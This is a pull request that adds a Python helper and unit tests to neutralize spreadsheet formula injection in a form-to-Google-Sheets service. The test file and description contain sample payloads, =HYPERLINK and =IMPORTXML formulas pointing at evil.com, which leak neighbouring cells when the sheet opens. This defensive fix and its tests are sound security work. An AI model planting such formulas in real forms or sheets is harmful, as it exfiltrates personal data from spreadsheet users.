### PR TITLE
fix: neutralize spreadsheet formula injection in sheets append (#2877)

### DIFF
--- a/server-python/services/sheets.py
+++ b/server-python/services/sheets.py
@@ -5,6 +5,19 @@ from typing import Any, Dict
 import gspread
 from google.oauth2.service_account import Credentials
 
+FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
+
+def _neutralize_formula(value: Any) -> Any:
+    """Prefix spreadsheet formula triggers with an apostrophe so the value is treated as text.
+
+    Mitigates CSV/spreadsheet formula injection (CWE-1236): a cell beginning with
+    =, +, -, @, tab, or CR would otherwise be evaluated as a live formula when the
+    sheet is opened.
+    """
+    if isinstance(value, str) and value and value[0] in FORMULA_TRIGGERS:
+        return "'" + value
+    return value
+
 class SheetsService:
     def __init__(self) -> None:
         private_key = os.getenv("GOOGLE_PRIVATE_KEY")
@@ -38,13 +51,13 @@ class SheetsService:
         sheet = self.client.open_by_key(self.sheet_id).worksheet(worksheet_name)
         row = [
             datetime.now().isoformat(),
-            form_data["name"],
-            form_data["email"],
-            form_data["whatsapp"],
-            form_data["year"],
-            form_data["branch"],
-            form_data["section"],
-            form_data.get("reason") or "",
+            _neutralize_formula(form_data["name"]),
+            _neutralize_formula(form_data["email"]),
+            _neutralize_formula(form_data["whatsapp"]),
+            _neutralize_formula(form_data["year"]),
+            _neutralize_formula(form_data["branch"]),
+            _neutralize_formula(form_data["section"]),
+            _neutralize_formula(form_data.get("reason") or ""),
         ]
         sheet.append_row(row)
 

--- a/server-python/tests/test_sheets_formula_injection.py
+++ b/server-python/tests/test_sheets_formula_injection.py
@@ -1,0 +1,35 @@
+from services.sheets import _neutralize_formula
+
+
+def test_neutralize_formula_prefixes_trigger_characters():
+    payloads = [
+        '=HYPERLINK("https://evil.com?x="&A1,"prize")',
+        '=IMPORTXML("https://evil.com","//a")',
+        "+1+1",
+        "-1+1",
+        "@SUM(A1)",
+        "\ttabbed",
+        "\rcarriage",
+    ]
+    for payload in payloads:
+        result = _neutralize_formula(payload)
+        assert result == "'" + payload, f"expected leading apostrophe for {payload!r}"
+        assert result[0] == "'"
+
+
+def test_neutralize_formula_leaves_safe_values_unchanged():
+    safe = [
+        "Priya Verma",
+        "priya@example.com",
+        "I want to join the club",
+        "1st Year",
+        "",
+        "normal text with = in the middle",
+    ]
+    for value in safe:
+        assert _neutralize_formula(value) == value
+
+
+def test_neutralize_formula_ignores_non_strings():
+    assert _neutralize_formula(None) is None
+    assert _neutralize_formula(123) == 123


### PR DESCRIPTION
# Summary
 
User-submitted form fields were written to Google Sheets via `append_row` with no neutralization of leading formula characters, so a value beginning with `=`, `+`, `-`, or `@` would execute as a live formula when an admin opens the sheet. This adds a neutralization helper and applies it to every user-derived cell.
 
## Description
 
In `server-python/services/sheets.py`, `_append_to_worksheet` built the row straight from `form_data` and appended it. The form model runs `sanitize_text` on some fields, but that only strips HTML and a few SQL keywords; it does nothing about leading formula characters. So payloads like `=HYPERLINK("https://evil.com?x="&A1,"prize")`, `=IMPORTXML(...)`, `+1+1`, and `@SUM(A1)` passed through with the trigger character intact.
 
The membership / recruitment / core-team endpoints are public (rate-limited but unauthenticated), and the `reason` field is free text up to 1000 chars, so any visitor can plant a payload. When a club admin opens the sheet, an injected formula executes in their Google account context: `=HYPERLINK` to phish and exfiltrate adjacent cells, or `=IMPORTXML`/`=IMPORTDATA` to pull neighbouring PII to an attacker endpoint on recalculation. This is CWE-1236 (spreadsheet/CSV formula injection).
 
The fix follows the standard OWASP mitigation: prefix any cell value that begins with a formula trigger (`=`, `+`, `-`, `@`, tab, CR) with a leading apostrophe, so the spreadsheet treats it as text.
 
I added a module-level `_neutralize_formula` helper and applied it to every user-derived cell in the appended row. The timestamp column is left as-is since it isn't user input. I kept the neutralization at the sheets boundary rather than folding it into `sanitize_text`, to avoid changing shared sanitization that other callers depend on. Folding it into `sanitize_text` for export-path coverage could be a sensible follow-up if you'd prefer that.
 
## Related Issue
 
Fixes #2877
 
## Type of Change
- [ ] Feature
- [x] Bug Fix
- [ ] UI/UX Improvement
- [ ] Performance Optimization
- [ ] Security Enhancement
- [ ] Refactoring
- [ ] Documentation
- [ ] Testing
- [ ] Infrastructure
- [ ] Integration
## Changes Implemented
 
- Added `FORMULA_TRIGGERS` and a `_neutralize_formula` helper to `server-python/services/sheets.py`.
- Applied `_neutralize_formula` to every user-derived cell in the row built by `_append_to_worksheet` (name, email, whatsapp, year, branch, section, reason).
- Added `server-python/tests/test_sheets_formula_injection.py` with unit tests for the helper.
## Technical Details
 
### Backend
 
`_neutralize_formula` prefixes a single apostrophe to any string starting with `=`, `+`, `-`, `@`, tab, or CR. Non-strings and safe strings (including a `=` mid-string) are returned unchanged.
 
### Frontend / Database / API / Infrastructure
 
n/a
 
## Screenshots
 
### Before / After
 
n/a (backend service change)
 
## Testing
 
### Unit Tests
- [x] Added `tests/test_sheets_formula_injection.py`: trigger-character payloads (`=`, `+`, `-`, `@`, tab, CR) get an apostrophe prefix; safe values and non-strings are unchanged.
### Integration Tests
- [ ]
### E2E Tests
- [ ]
### Manual Testing
- [x] Ran `python -m pytest tests/test_sheets_formula_injection.py -v` (3/3 pass).
## Security Review
 
Mitigates CWE-1236 (spreadsheet formula injection). User-supplied values can no longer be interpreted as formulas when the sheet is opened or recalculated. The change is confined to the write path into Google Sheets and does not alter validation behavior elsewhere.
 
## Accessibility Review
 
n/a
 
## Performance Impact
 
Negligible (a leading-character check per cell on append).
 
## Breaking Changes
- [x] No Breaking Changes
- [ ] Breaking Changes Documented
## Deployment Notes
 
None.
 
## Rollback Plan
 
Revert this commit; it restores the previous row-building behavior.
 
## Checklist
- [x] Code follows project standards
- [x] Tests added or updated
- [ ] Documentation updated
- [ ] Security reviewed
- [ ] Accessibility reviewed
- [ ] Performance validated
- [ ] CI/CD passing
- [ ] Ready for review